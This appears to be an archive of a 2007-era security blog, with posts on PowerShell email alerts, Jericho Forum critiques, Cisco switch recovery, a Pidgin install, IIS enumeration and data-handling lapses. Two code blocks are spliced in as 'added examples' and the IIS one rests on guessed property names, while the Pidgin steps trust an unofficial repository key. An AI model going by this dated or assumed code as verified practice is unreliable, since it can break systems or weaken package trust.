    First, I want to prove I can send email from my workstation through the fictitious mail server at mail.server.com. Each of the .Send method arguments can be string variables if needed.
    $smtp = new-object Net.Mail.SmtpClient("mail.server.com")
    $smtp.send("mike@server.com","mike@server.com","test","test")
    $smtp


    Host : mail.server.com
    Port : 25
    UseDefaultCredentials : False
    Credentials :
    Timeout : 100000
    ServicePoint : System.Net.ServicePoint
    DeliveryMethod : Network
    PickupDirectoryLocation :
    EnableSsl : False
    ClientCertificates : {}
    This next example dumps the email to the local IIS instance. Just change the DeliveryMethod and then send the email as normal.
    $smtp = new-object Net.Mail.SmtpClient
    $smtp.DeliveryMethod = "PickupDirectoryFromIis"
    $smtp.send("mike@server.com","mike@server.com","test","test")
    $smtp


    Host :
    Port : 25
    UseDefaultCredentials : False
    Credentials :
    Timeout : 100000
    ServicePoint : System.Net.ServicePoint
    DeliveryMethod : PickupDirectoryFromIis
    PickupDirectoryLocation :
    EnableSsl : False
    ClientCertificates : {}
    I consider this a major part of scripting of any type: notifications. It is not necessarily enough to just log something if you never check logs. I'd rather throw something to the foreground, which includes an actual error, or in the case of a daily notification that a script has run, a quick email to my Inbox. This can even complement logs, such as with a log tail script that emails on certain events. Among many, many other uses.
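    As an added example (not the post's own code), here is the same SmtpClient usage wrapped into a reusable function, with the delivery method switchable between a network SMTP server and the local IIS pickup directory, and with the EnableSsl and Credentials properties from the output above actually set rather than left at their defaults. The log-watching call at the bottom is the "log tail script that emails on certain events" use the post mentions. The mail server, sender, recipient, log path and match pattern are all constructed placeholders.

```powershell
# Send-Notification: wraps System.Net.Mail.SmtpClient so any script can send a
# notification without repeating the SMTP setup. Returns $true on success.
function Send-Notification {
    param(
        [Parameter(Mandatory = $true)] [string]$To,
        [Parameter(Mandatory = $true)] [string]$Subject,
        [Parameter(Mandatory = $true)] [string]$Body,
        [string]$From = "alerts@server.com",          # placeholder sender
        [string]$SmtpServer = "mail.server.com",      # fictitious server, as in the post
        [int]$Port = 25,
        [switch]$UseTls,                              # STARTTLS; pair with the submission port (587)
        [System.Management.Automation.PSCredential]$Credential,
        [switch]$PickupFromIis                        # drop the mail into the local IIS pickup directory
    )

    if ($PickupFromIis) {
        # Same as the post's second example: IIS picks the file up and delivers it.
        $smtp = New-Object System.Net.Mail.SmtpClient
        $smtp.DeliveryMethod = [System.Net.Mail.SmtpDeliveryMethod]::PickupDirectoryFromIis
    } else {
        $smtp = New-Object System.Net.Mail.SmtpClient($SmtpServer, $Port)
        $smtp.DeliveryMethod = [System.Net.Mail.SmtpDeliveryMethod]::Network
        # Plain port-25 SMTP sends the message body in the clear; turn on TLS
        # whenever the server supports it.
        $smtp.EnableSsl = [bool]$UseTls
        if ($Credential) {
            $smtp.Credentials = $Credential.GetNetworkCredential()
        }
    }

    $msg = New-Object System.Net.Mail.MailMessage($From, $To, $Subject, $Body)
    try {
        $smtp.Send($msg)
        return $true
    } catch {
        # A failed notification must not silently vanish; surface it to the caller.
        Write-Warning "Notification to $To failed: $($_.Exception.Message)"
        return $false
    } finally {
        $msg.Dispose()
    }
}

# Usage: scan a log for events worth waking someone up for and mail the matches.
# Log path and pattern are constructed for this example.
$logPath = "C:\logs\app.log"
$pattern = "ERROR|Failed logon"
$hits = Select-String -Path $logPath -Pattern $pattern |
        Select-Object -Last 20 |
        ForEach-Object { $_.Line }

if ($hits) {
    # Get-Credential prompts interactively; for a scheduled task, store a credential
    # once with Export-Clixml (DPAPI-protected on Windows) and load it with Import-Clixml.
    $cred = Get-Credential
    Send-Notification -To "mike@server.com" `
                      -Subject "Log alert on $env:COMPUTERNAME" `
                      -Body ($hits -join "`n") `
                      -Port 587 -UseTls -Credential $cred
}
```

    The function returns a boolean rather than just printing, so a calling script can log the outcome or fall back to another channel when the mail server is unreachable. Select-Object -Last requires PowerShell 2.0 or later.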
    .: jericho 5 - commandments 9-11
    Continuing my smallish review on the Jericho Forum commandments (pdf) and their concept of de-perimeterization, I have just three commandments left, all under the category, "Access to data."
    Access to data should be controlled by security attributes of the data itself

    - Attributes can be held within the data (DRM/Metadata) or could be a separate system
    - Access / security could be implemented by encryption
    - Some data may have “public, non-confidential” attributes
    - Access and access rights have a temporal component
    This sounds like a Mandatory Access Control system where data contain attributes which determine access and use. This is a bit odd, since I have only heard of this system used by governments (classified, unclassified, top secret...).

    This also sounds like DRM, which, nicely enough, is mentioned by term in the bullets! One problem with DRM and metadata is forcing adherence to the metadata or DRM (let's call it collectively DRM for my own sake). What if you have metadata that dictates FileX should only be used by 15 people. What if I come in and read FileX but decide to ignore the DRM tags? Is this another form of encryption? Why can't I just leverage the DRM to get the data and then move it elsewhere as a copy? Sound familiar? It should, since we're seeing how useful or futile DRM processes can be with media and copyright.

    MAC has worked for the government and military for a long time, but I think that has to do with a) the rigid discipline of the military and secret organizations, and b) the long-term habitual, forced use of it. Can this be as rigid and forced globally? At this point in time, I can't see that happening in the foreseeable future.

    Overall, oddly, I do like this commandment. Even if I don't buy into the specified mechanics, I agree we need to focus on data. Not to the exclusion of the network or systems, but focusing on the data needs to be part of the security equation.
    Data privacy (and security of any asset of sufficiently high value) requires a segregation of duties/privileges

    - Permissions, keys, privileges etc. must ultimately fall under independent control, or there will always be a weakest link at the top of the chain of trust
    - Administrator access must also be subject to these controls
    Hoo-boy...this is a tough one. This commandment pretty much ensures that data protection solutions will be complex. Ultimately, you do need someone who turns the keys when it comes to protection. Maybe two people, or three, but someone somewhere will either have the power or a collusion of forces will have the power. And that's in extremely complex setups for separation of duties/privs.

    But even if this commandment is complex and maybe ultimately not of interest or achievable to most organizations, this is a good guideline to try to achieve. Most everyone has domain admin credentials and a need to create accounts in an organization. These tasks/privs can be separated to various people with various auditing and authorization chains.

    Is this scalable for small companies with 1 IT person, or even medium-sized companies? Good question, and likely not. Even in my current team of 5 network guys and 3 desktop guys, we really don't have the corporate interest in slowing down our processes to achieve this idea ultimately. We do so for a couple tasks and privileges, but otherwise it is just not worth our time to figure out.
    By default, data must be appropriately secured when stored, in transit and in use

    - Removing the default must be a conscious act
    - High security should not be enforced for everything; “appropriate” implies varying levels with potentially some data not secured at all
    In other words, default should be secure. If you want it less secured, you have to choose to unsecure it, or back down on the security controls to an appropriate level. Sounds good to me, although I think this commandment is much more attainable in closed networks, i.e. networks with boundaries.

    Oh, wait, hold on...did I say networks with boundaries? Yup! Networks with perimeters! Without perimeters...well, that means either the whole Internet needs to run on new protocols (which I believe the Jericho Forum would like to see happen) or we need a global IPSec (or encryption/PKI) setup that is trusted by all. Ack.

    Of interest, it seems this is the only commandment that allows some leniency. Someone determines what is appropriate, rather than blanket, rigid statements like most of the other commandments. Quite interesting to have a subjective commandment in here, but still appropriate.

    jericho 1 - de-perimeterization and the jericho forum commandments
    jericho 2 - the jericho forum and the de-perimeterization solution
    jericho 3 - the first three commandments: the fundamentals
    jericho 4 - commandments 4 - 8
    jericho 5 - commandments 9-11
    jericho 6 - my conclusions
    .: jericho 6 - my conclusions
    I've been checking out the Jericho Forum commandments (pdf) and their concept of de-perimeterization. I'm happy to have taken the time to sit back and examine their material posted. Whether I agree or not, it is useful to examine discussion and what other groups think.

    1) I stand by my initial thoughts that the concept of "de-perimeterization" is old. I really bet this concept is rooted back in a time before deep inspection firewalls, and maybe even before stateful firewalls. The term is unfortunate and likely needs to be changed, unless they are using it just for the attention. If so, it works! :) But otherwise, I don't buy that de-perimeterization is the future. Sure, maybe borders of yesterday were nice and square like the state of Colorado. But today and maybe into the future our borders will be more complicated like the islands of the Nunavut Territory in Canada (am I the only one who missed the Northwest Territories being split? And does that mean I don't know my geography? ...the flaw in quizzing adults about geography and generalizing the result down into child education values...). Nonetheless, there are still borders and we will always have a perimeter of some sort for as long as we need any type of centralized management of systems or data.

    2) The commandments do make for an excellent ideal. A possibly unattainable ideal. I'm dubious about the scale of such solutions, and I really think this framework only works on a very large scale. Anything below it really can't be bothered.

    3) On the other hand, this framework does include excellent guidelines and "rules." Even if they are not followed to a letter, they are rooted in solid digital security concepts. We should keep them in mind no matter what ultimate framework we follow.

    4) Likewise, I really think all security professionals should review what the Jericho Forum is saying, and I'd love to attend a presentation some day for even more clarification and discourse. As sec pros, we should be able to discuss such things and keep an open mind about other viewpoints. Besides, if there was an ultimate and perfect solution to our problems, I'm guessing we'd have happened upon it by now and all been wowed to the point of tears. But we're not, and as such, any and all approaches tend to have strong points and good ideas.

    5) In the end, do I care about this framework itself? Not really. It's a great exercise, but not really actionable for me in a smaller company beyond just being informed.

    jericho 1 - de-perimeterization and the jericho forum commandments
    jericho 2 - the jericho forum and the de-perimeterization solution
    jericho 3 - the first three commandments: the fundamentals
    jericho 4 - commandments 4 - 8
    jericho 5 - commandments 9-11
    jericho 6 - my conclusions
    .: i blame you for whatever went wrong to me today
    Articles like this one about DHS looking to investigate a government security contractor illustrate some of the crap (normal business activity) that occurs in our industry. I'm not going to presume I know the full story or what was in the original contract or what Unisys' opinion is, but I think this article illustrates two painful realities.

    1. If DHS is attacked and they have someone to blame such as a contractor who should be taking care of things, the blame can and likely will be shifted, rightfully or not. This basically means the "information age" is not just surging along and pulling culture with it, but business culture is requiring information be saved and documented to avoid he-said-she-said crap. So unless Unisys goes the proverbial extra mile in the contract and also documents all deviations or obstacles, and because security will always eventually fail, there will always be a scapegoat. And blaming everyone else for responsibility for things is a hallmark of the 90s and 00s. (All starting with the McDonald's woman who spilled hot [no shit?!] coffee on herself and successfully sued.)

    2. The government is opening up competing bids for the contract. That means we have a major differentiator being cost/price. And we all can guess how the quality of security may follow the line of price. Lowest bid will almost certainly ensure the security is also of lower quality.
    .: switch basics: loading up a wiped cat 2950
    Holy crap 9600 baud is slow! I'm doing something different in loading a wiped switch, and I thought I would use an xmodem transfer. Go me! Since this is taking so long, I may as well post some switch basics as I go. (To note, my earliest speeds on the Internet were 14.4kbps modems back in high school.) I'll also go ahead and put on some background music, the excellent Dubnobasswithmyheadman album from Underworld (a favorite!).

    I have a completely wiped Cisco Catalyst 2950T switch. Even the flash has been erased (an eraser of love). If you boot it up, it gives an error and stops pretty quickly. A quick "dir flash:" will show nothing. I also have an ios version ready and waiting: c2950-i6k2l2q4-mz.121-22.EA8a.bin. For my console system I have an old Dell Latitude laptop (yeah, it's one sexy-small laptop!) running a permanent install of BackTrack2.

    To get the c2950-i6k2l2q4-mz.121-22.EA8a.bin file to BackTrack2, I decided to also test my tftp server and use tftp to transfer the file. My tftp server is at 192.168.10.108.
    tftp 192.168.10.108 -c get c2950-i6k2l2q4-mz.121-22.EA8a.bin
    Gosh, that's easy. Now I need to connect up to the switch by plugging in necessary cables, including the power so that it powers on and loads. I decide to use CuteCom in BackTrack2 as my graphical terminal emulator. I change the baud rate to 9600 and click Open device. I type a few commands to get ready for my transfer.
    switch: flash_init
    Initializing Flash...
    ...The flash is already initialized.
    switch: load_helper
    switch: copy xmodem: flash:c2950-i6k2l2q4-mz.121-22.EA8a.bin
    Begin the Xmodem-1k transfer now...
    At this point the terminal is waiting for some data. CuteCom has a Send File button at the bottom where I can select the file and start transferring at the blistering 9600 speed! In fact, after writing this, I'm still only up to 15% completed. Ahh the joys of a wiped device that doesn't even know what an IP address is yet.
    .: emulate cisco routers
    Emulate some Cisco routers on your laptop using Dynamips. This looks awesome! From Andrew Hay.
    .: when terminal/server is reinvented as desktop virtualization
    Ever read an article that makes you kinda stop anything else you're doing as you try to make sense of it? Then read it again, which doesn't help...then read it in bits and pieces to see if you can make sense of the parts in order to tackle the whole? And then maybe still wonder what sort of crack the author is on? I had that this morning reading an eWeek article, Analysts Predict Death of Traditional Network Security. I guess there's a reason I didn't re-up to eWeek a few years ago. And it is just coincidence that the topic is de-perimeterization and mentions the Jericho Forum, I swear!
    According to them, in the next five years the Internet will be the primary connectivity method for businesses, replacing their private network infrastructure as the number of mobile workers, contractors and other third-party users continues to grow.
    ...So the Internet is not already a primary connectivity method? I guess I underestimate the Frame Relay and dedicated links market dramatically!
    One of the end results of the death of traditional network security will be a growth in desktop virtualization, Whiteley said.
    Hey, that's kinda cool to read. In fact, we're right now doing some desktop virtualization for mobile employees, particularly developers offsite. They VPN into our network with a system, then Remote Desktop into a virtual machine on our network upon which they work. Odd...I never once thought of this approach as being part of de-perimeterization or the death of the nebulous "traditional network security." It's a way to avoid bandwidth restrictions and data egress.
    Desktop virtualization allows a PC's operating system and applications to execute in a secure area separate from the underlying hardware and software platform. Its security advantages have become a major selling point, as all a virtualized terminal can do is display information; if it is lost or stolen, no corporate data would likely be compromised since it wouldn't be stored on the local hard drive.
    And this is where we finally stop toeing the brakes and actually put some pressure down on the pedal. I don't think the author was involved in something called terminal/server architecture before, since that's what he described. He did not describe desktop virtualization. Maybe we're seeing the bastardization of terms...which is unfortunate. There is a point to be made about moving to virtual desktop systems and also moving back to terminal/server setups, but it really has nothing to do with de-perimeterization or the use of the Internet to connect businesses. It has to do with support costs, desktop OS compliance activity, and data security. All of which are vague and ubiquitous enough to "support" pretty much any security theory or initiative. Part of my religion is predicated on you breathing regularly. If you breathe regularly or believe in breathing, then you support my religion. Um, no.
    The adoption of PC virtualization would mean companies would no longer have to provision corporate machines to untrusted users, Lambert said. Desktop virtualization simply equals a more secure environment, she said.
    Hrm, I don't follow that reasoning at all. In fact, this is a three-punch combo in confusion. People provision computers to untrusted users? Desktop virtualization means you don't have to provision anything now? And somehow that makes things all more secure? I'm feeling nauseous...

    I think the author and the people quoted in the article (Forrester analysts) need to take a step back and iron out what they mean by desktop virtualization and how that compares to the age-old terminal/server environment, and move forward from there. But some of these conclusions just don't follow, and the muddiness of the terms and logic makes the article a waste of time.
    .: unisys and dhs security debacle
    The other day I posted about Unisys and the DHS. After seeing a post from Bejtlich, I see they're fully wading into it together. Ugh.

    While I won't defend Unisys, I'll play Devil's Advocate for just a moment. Was Unisys just providing the systems and process and DHS was meant to actually put things into operation? And I wonder if there were any obstacles imposed by DHS that prevented things like IDS systems being implemented? I know it can be a pain when you're asked to install ABC onto 45 systems, but half of them keep telling you they're too busy and to try again next week.

    It obviously sounds like Unisys made some really poor decisions, but I'm curious on the extent of them from Unisys and from DHS itself, if any. Thankfully, this is the transparent government and not private companies, so we get to watch the laundry shake violently in the wind.
    .: the linux file system
    This image of the Linux file system is extremely cool! I think I'll print a few copies out and put them next to my computers. Layouts are one thing, but to make a useful one with some instruction on what some of the more esoteric sections are is excellent!
    .: how do you eat your 0day?
    There is an interesting discussion this week on the Full Disclosure mailing list about the definition of "0day." Oddly, what seems like an old term is definitely not a term with an understood and universal definition. It seems to vary widely, dramatically widely. Then again, FD is a fairly argumentative list with some people arguing anything just to argue. Still, it is interesting the lack of clarity in some of our widespread terms.

    My take on 0day, which I've used ever since I first heard the term many years ago, is pretty much the same as the Wikipedia entry. To me, a 0day is an exploit released before solutions or patches have been disseminated from a vendor. This wouldn't mean a new strain of a virus exploiting a known vulnerability would be a 0day. But a new worm exploiting a new vulnerability would qualify. A side effect is whether something is a 0day to someone who has seen it, and provided for a workaround, even though they're not the vendor. To me, 0days are somewhat unstoppable exploits, mitigated by defense in depth / layered defenses.

    And don't even bring up "less than 0day," as I feel dumber each time I hear that term...
    .: some logging notes
    Cutaway has an excellent interview up with Michael Farnum who talks about his experiences with companies in regards to a number of things, namely logging. Does he see companies logging, are they doing it properly, and so on. Excellent insight into what's really going on, and not as untrustworthy as a sheet of stats from some vendor with an agenda.

    Reflecting on the questions and answers, here are some of my bullet points when it comes to centralized logging discussions.

    1. The IT team needs to see value in the process of logging and reading logs. If they don't see value, they either won't do it, won't do it properly, or have no clue how to leverage it. If they don't see value and the business sees no value, it just plain won't get done. This probably always ends up not being a security value-add, but rather an operations one. Something went wrong with a web app, can you troubleshoot it by looking at the logs? Or a server isn't updating properly from WSUS...and so on. Logging should be seen as important as a heart monitor on a patient in the hospital.

    2. Once there is value, or maybe even before the value is realized, admins need the time to properly get things set up. Having enough time to gather Windows event logs and nothing else is going to be a wash. Same with just gathering the logs on half your firewalls. Give the team enough time to properly get things going.

    3. Set aside time for the admins to regularly look at logs and maybe even "play" with the logging server. If admins don't have time or are not allowed to use the logging reporting and querying regularly, they won't have the familiarity to do it when emergencies or high profile incidents arise. Practice, practice, practice.

    4. For the love of whatever, read Anton's paper(s) about the six mistakes of logging.

    My own logging? At home, I don't do enough. At my last job, we did logging, but didn't use it enough or probably use it properly. At my current job, we don't do enough logging at all.
    .: the security silver bullet syndrome in negative exposure
    It's not often someone hits a pet peeve of mine dealing with security, but I bristled at one just now.

    One of my tenets of security is to make sure to not believe there is a silver bullet or security panacea. I think we universally believe that.

    But there are insinuations and beliefs that, in a way, are saying there really is a silver bullet. Most of these have to do with saying "Security measure X is not 100% effective, therefore it is useless/inefficient/expendable."

    I've seen this with Jericho Forum defenders who say the perimeter is porous now, which must mean the firewall is less efficient, which must mean we're moving towards no perimeters. "What use is a perimeter defence with holes in it after all?"

    Such a statement is analogous to saying, "I expect my security measures to be silver bullets."

    I don't think I've stumbled downhill nearly that violently since breaking my leg sledding one winter...
    .: secutor prime examines desktop compliance checklisting
I don't do much desktop work right now, but it is still nice to see how a system compares to various standards. I'm not sure where I picked this up yesterday, but I got pointed over to a tool, Secutor Prime, which examines a system and compares it to various standards such as the FDCC. The best part of this tool is the feedback. Clicking on any check will give the findings and also the steps needed to pass that particular test. An excellent means to learn more about desktop security, the settings, and what compliance checklists look for.
    .: interview with rfp
    RainForestPuppy (one of the coolest names ever) wrote a memorable memorandum a few years ago. I've mentioned it before. That memorandum holds a special place in my mind, and I'd definitely buy this guy a few drinks if I were to ever meet him.

    Infiltrated recently posted an "interview" with RFP.
    .: installing pidgin 2.2.0 on ubuntu 7.04 to use google talk
    I recently decided I needed to use Google Talk. I don't know why, but I have Gmail accounts, so why not buddy up to Google Talk? I use Pidgin 2.0.0 on my Ubuntu 7.04 laptop. Unfortunately, I was having no luck getting XMPP (Google Talk) to connect properly. An upgrade to 2.2.0 is in order, right? Unfortunately, nothing exists in the repositories to upgrade Pidgin. Great! When I did the following steps, I did not have to remove my old Pidgin installation, and all settings and buddies were carried up just fine.

    First, I need to update my repositories list:
    sudo gedit /etc/apt/sources.list
    with:
    deb http://repository.debuntu.org/ feisty multiverse
    deb-src http://repository.debuntu.org/ feisty multiverse
    Then run the following commands:
    wget http://repository.debuntu.org/GPG-Key-chantra.txt -O- | sudo apt-key add -
    sudo apt-get update
    sudo apt-get install pidgin
    sudo apt-get install pidgin-libnotify
    After this, Pidgin can be started from Applications -> Internet -> Pidgin. Once the app has started, I want to connect to Google Talk. Accounts -> Add/Edit -> Add -> Google Talk.

    My protocol is XMPP by default. Screen name is my Gmail login. Domain is gmail.com. Resource is left to the Home default. In the Advanced tab, I checked Require SSL/TLS, chose a connect port of 5222, and connect server talk.google.com. I left the Proxy type to Use GNOME Proxy Settings.

    References
    installing pidgin 2.2.0
    connecting to google talk
    .: thoughts on cyberinsurance
    Bejtlich slammed out a bunch of posts late last week which I'm still wading through. Excellent food for thought for a whole week or more! I just wanted to jot a few thoughts of my own down, fairly unformulated ideas...

    Cyberinsurance. It really does make sense on paper, no? And it's one of those things we look towards like the sun peeking from the clouds in the distance as we're still getting poured down upon; there is an end!

Sadly, it's not a perfect solution. IT is spendy. Unlike fire insurance measures which may just include inheriting whatever the builders built plus marking exits with placards and posting occasional fire extinguishers, we inherit insecure building blocks and have to do a hell of a lot more to detect and monitor while also providing IT services to the business. That's a very different magnitude.

    Fires happen, but not very often. Cyber attacks may not happen to your business very often either, if at all, but they certainly seem to occur on smaller scales very often. Viruses, worms, snarfed credentials, file loss through P2P. While this isn't like a fire that destroys a building, IT security is more like lots of little fires that can pop up every week in various corners.

    Likewise, what if it were profitable for people to set fires to your building? And they could set fires without being physically present? And have little chance of being caught unless the fire gets way too big? I think we'd see lots of fires and fire insurance would have some pretty deep questions to start asking itself.

    When a fire occurs, there are professionals trained to examine and determine fire causes. These causes, with extremely exotic exceptions, should be fairly finite and predictable based on the operations that take place in that building. Negligence can be supported with building specifications, local and federal laws and standards, and inspections based on specifics. IT is far more wide in the spectrum of choices, tools, implementations, and so on. There are best practices for things like a Windows shop, but relatively few people know them fully or pursue certs that would help solidify them.

Maybe cyberinsurance will be a way to show compliance? For instance, you do measures X, Y, Z, and part of G, and you won't have to pay all that much more in premiums. Of course, how much do those measures cost compared to the savings? Taking this a step further, how is this very different from the much-maligned "HackerSafe" logo on websites? As an industry (and the media, and thus average people, and thus culture), we're very intolerant of single failures. This might be because single failures can affect millions of people in ways we probably don't even know about yet. Or it might be because it's all so very dramatic yet... Laptop theft has existed since there have been laptops, but it seems like more now because of the disclosure requirements...

    Insurance also seems to be something people buy to protect against things outside their control. Attackers and other digital shenanigans are maybe not so much seen as random or natural acts, but rather things we can control. Why buy cyberinsurance when that money can be spent on the IT/security infrastructure? We still have a lot of ways to become more secure, whereas insurance seems to me to be something you buy when you're out of alternatives and need a safety net.

Cyberinsurance sure sounds good, but I wonder if our current state is going to upheave such an insurance model in the same fashion that technology is upheaving our idea of copyright and privacy.

    Anyway, just some thoughts for me for the future, nothing solid or much that I'd back in a challenging discussion, yet. :)
    .: security even a caveman can break
    I saw via Bejtlich that InformationWeek has an excellent article up about Robert Moore, the hacker who, a few years ago, broke into quite a few telecom (and likely other) organizations to route and steal VOIP.

    The article continues to pound home that we're doing the simple things very badly. And we have no friggin' clue when someone malicious is doing things inside our network. Here's some meat, though:
    "It's a huge problem, but it's a problem the IT industry has known about for at least two decades and we haven't made much progress in fixing it," said van Wyk. "People focus on functionality when they're setting up a system. Does the thing work? Yes. Fine, move on. They don't spend the time doing the housework and cleaning things up."
    That's really a huge part of the problem, isn't it? Implement VOIP, and hope that you get time to get back to it later to evaluate the security before your next big projects come up. And so on.

Really, I feel that this problem is twofold. First, we're still maturing in our grasp of technology. Unfortunately, and *naturally,* the attackers are maturing faster. This happens in biology as well, so we need to accept and expect it as a given. Second, we lack the time and resources to either do the job correctly up front or revisit the job later and fix it up.
    .: on being aware of your environment
    This ran across my Art of War calendar today, and makes a good statement about detection/logging, which is still being undervalued in today's organizations.
    What everyone knows is what has already happened or become obvious. What the aware individual knows is what had not yet taken shape, what has not yet occurred. Everyone says victory in battle is good, but if you see the subtle and notice the hidden so as to seize victory where there is no form, this is really good. Chapter 4: Formation
    .: o3 magazine is back
    I was scrolling through the latest Insecure magazine (did they get swallowed by net-security.org...?) and saw an ad on the very last page for o3 magazine? Huh? They appeared to be inactive earlier this year; in fact, their web site disappeared.

I checked the site and sure enough, they're not just back, but back with lots of content. Issues 6 and 7 were released in August 2007, and Issues 8 and 9 just came out for Sept 2007. Weird, but welcomed!
    .: imagine an open sourced axis network camera
I wasn't going to post about the recent vulns released about Axis 2100 IP cameras. They are neat vulns which illustrate the dangers that XSS and CSRF can bring to devices with web interfaces, or how even internal sites can become exploited grounds. I especially like that you can replace a video feed, which you always see so effortlessly executed in movies. I really like the vuln where viewing the log files will execute javascript, which reminds me of a recent WS_FTP DoS that works in similar fashion. There are a couple videos out there showing off the exploit. Both links are in the paper (pdf).

    No, I wasn't going to post it because I figured it would get covered well enough anyway. But then I read the paper. And on one of the last pages of the paper is the real meat that made me think, "Aw yeah!" The authors describe how they were able to glean enough information from an Axis development wiki to probably compile their own tools. Whoa, this just went to another level! Axis may not support this particular device anymore, but if people can successfully compile and upload tools into this device, we could see a resurgence of popularity that may mimic (in smaller scale) the popularity of Linksys' WRT54G wireless router.

    I really think Axis could take advantage of this interest and help anyone looking to build tools. I mean that seriously...if they decide to open source it more...
    .: powershell: list of sites in IIS
    Getting a list of all the sites in IIS 6 is typically as easy as right-clicking Web Sites and choosing Export List. I decided I wanted to do this through PowerShell. I'm sure there are plenty of ways to do this, but this is one I got to use today.
    $objSites = [adsi]"IIS://serverorlocalhost/W3SVC"
    foreach ($objChild in $objSites.Psbase.children)
    { $objChild.servercomment }
    This should output all the names of the sites that you would see in the IIS management console. If you want to know what else can be pulled, grab one of those objects and pipe it to get-member. I haven't figured out how to pull the Home Directory, but IP should be under .ServerBindings, the ID should be under .Name, and so on. I suspect IIS7 will be even easier to manage via PowerShell.
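As an added example (not the post's own code), the snippet above extended into an inventory script that also pulls each site's bindings and home directory; the ServerComment, ServerBindings and Name properties come from the post, while filtering on the IIsWebServer schema class and reading Path from the site's ROOT virtual directory are my assumptions about the IIS 6 ADSI provider.

```powershell
# Added example: inventory IIS 6 sites via the ADSI metabase provider.
# Assumes the IIS:// provider is available and that the caller has
# read access to the metabase. $Server is a placeholder.
param([string]$Server = "localhost")

$objSites = [adsi]"IIS://$Server/W3SVC"
$inventory = @()

foreach ($objChild in $objSites.Psbase.Children) {
    # W3SVC also contains non-site nodes (Info, Filters, ...); only
    # IIsWebServer children are actual sites (assumed schema class name)
    if ($objChild.Psbase.SchemaClassName -ne "IIsWebServer") { continue }

    # The home directory is the Path of the site's ROOT virtual directory
    # (assumed property of the IIsWebVirtualDir object)
    $root = [adsi]"IIS://$Server/W3SVC/$($objChild.Name)/ROOT"

    $row = "" | Select-Object Id, Name, Bindings, HomeDirectory
    $row.Id            = [string]$objChild.Name            # site ID, e.g. 1
    $row.Name          = [string]$objChild.ServerComment   # name shown in the MMC
    # ServerBindings entries look like "IP:port:hostheader"; an empty IP
    # means the site listens on every interface, worth flagging in a review
    $row.Bindings      = @($objChild.ServerBindings) -join "; "
    $row.HomeDirectory = [string]$root.Path
    $inventory += $row
}

# One line per site; pipe to Export-Csv instead for a keepable record
$inventory | Format-Table Id, Name, Bindings, HomeDirectory -AutoSize
```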
    .: when production data is allowed to visit the slums
    Adam over at EmergentChaos posted this blurb, which I'm also going to quote, in regards to an Accenture data loss incident:
    Connecticut hired Accenture to develop network systems that would allow it to consolidate payroll, accounting, personnel and other functions. Information related to Connecticut’s employees was contained on a data tape stolen from the car of an Accenture intern working on an unrelated, though similar project for the State of Ohio. (The tape also contained personal information on about 1.3 million Ohio residents.) The intern apparently had been using the Connecticut program as a template for the Ohio project.
Holy shit, do I hate when developers insist on using production data in development environments. It is amazing how difficult that fight can be to get them to use test data, or to take production data and thoroughly scrub it on the first copy down. Of course, later on they want "refreshes" downward, or they start sharing amongst themselves when one wins the fight for their project...

    Couple that with the fight to allow them to put such data on their laptop, and you get a lot of bad blood pretty quickly over just two out of a gazillion issues.

    It is going to be very important in coming years that companies who allow their data to be used by someone else will want written statements about who has access to their data and where. Will it be on development systems in the squishy internal network, or available for an intern to query out and take home? Can you provide names of everyone that will have access? If you have any DBA duties, start preparing for this storm now! These questions are being whispered now*, but often aren't taken too seriously...yet.

    1- Know who has access to what data, including queries as well as full database access.
    2- Provide a process for requests and approvals for access to databases.
    3- Know who ran what and took out what data. If an intern pulls a bunch out, you better well know it when they do. Know how to pull those logs and massage them for the answers.

    These are just a few basic management questions that, if not answered, will leave them in a position to make uninformed decisions and actions.

    As a side note, other questions are being and should be asked about the whole lifecycle of that data when it leaves the nest. Is the transmission of that data secure (SFTP, FTP, Web, Email...)? Is the first stop for that data secure and/or temporary (your contact's email box, the ftp server...)? How does the data get to the desired location or is it kept somewhere internally before being used (uploaded to a file server, sits in someone's PST file, gets backed up to tape from the ftp server...)? When at the end location (database, hopefully), who has access to it? When the work is done or the contract terminated, what is the data removal process (tapes, servers, databases, official backups, backups the developers have made...). Yes, it's more than the DBA, but really the easiest place to start is with the DBA duties.
    .: in linkedin
    Oh noes, I'm in LinkedIn. Those of you who have bugged me...ok, ok, I'm digging it. I like that only people in my "network" get to see anything worthwhile about me. Anyway, if you read my blog at all and are in my network, chances are you're "ok" to add, so feel free to find me, Michael Dickey. Or email/comment and I'll find you instead.
    .: defcon 15 video on the dirty secrets of the security industry
Finally getting around to watching DefCon videos, and I started out with Bruce Potter's Dirty Secrets of the Security Industry presentation. I've seen recordings of Bruce Potter talks before at ShmooCon, and I've enjoyed his presence. Definitely a cool guy with a lot of passion for the industry, and I think he's open to creating discussion, even if he knows he's wrong and just trying to get everyone to think. I can't help but admire that! Here are some notes, followed by reactions of mine. I definitely recommend watching this talk. Everything in blockquotes is a paraphrase or quote lifted from the slides and presentation.

    Bruce opened by talking about some foundational concepts and history of security. He made a point to show that security is still growing and making more and more money. He then went into his dirty little secrets.
    Secret #1 - Defense in Depth is Dead - The problem is in the code. We've always had bad code. Fix the code. Firewalls don't help things that have to be inherently open, like port 25 to the Internet for the mail server. Spending way too much money and time with defense in depth! Need type safety (programming), secure coding taught in schools, and trusted computing. We need better software controls on our systems, not better firewalls.
    I'm hearing a lot more about this lately, about how we need inherently secure systems and devices and protocols. :) All his points are good, and I really don't oppose outright a viewpoint like this. We need better training for software developers and we really do spend a shit-ton of money on more and more defenses that are band-aids to deeper problems.

    However, I don't think defense in depth is dead. I think he has great points, but I'd throw a shmoo ball at him for the sensational title of the secret. :) We're humans, and humans are producing code. It just takes one incident (which he says in a later slide) and defenses can break. That's the point of defense in depth. Not necessarily about band-aiding insecure code, but rather ensuring that 1) we account for mistakes and unknown holes, and 2) we make sure attackers have to really try, or collude, or take a lot of time. If I can solve issue GER, and that's your only defense, I win. If I have to solve issue GER plus LIG, I'm stuck...or I have to find help or spend more time breaking in.

    This defense in depth approach only makes it *look like* we're just band-aiding insecure code, which we kind of are, but that's just an ancillary issue. To put it better: it's an arguable position. (Marcin, if you're reading this, yes, I use these $10 words all the time!)
    Secret #2 - We are over a decade away from professionalizing the workforce - Much of our jobs is learned through self-education, not professional education centered around security. How do we codify and instruct the next generation? Security is everyone's problem...because no one really knows how to properly do it. We can't train all our professionals, how do we expect to train all our users? Users need tools that they can't screw up; that don't require education to be used securely. Years and years away from making this better.
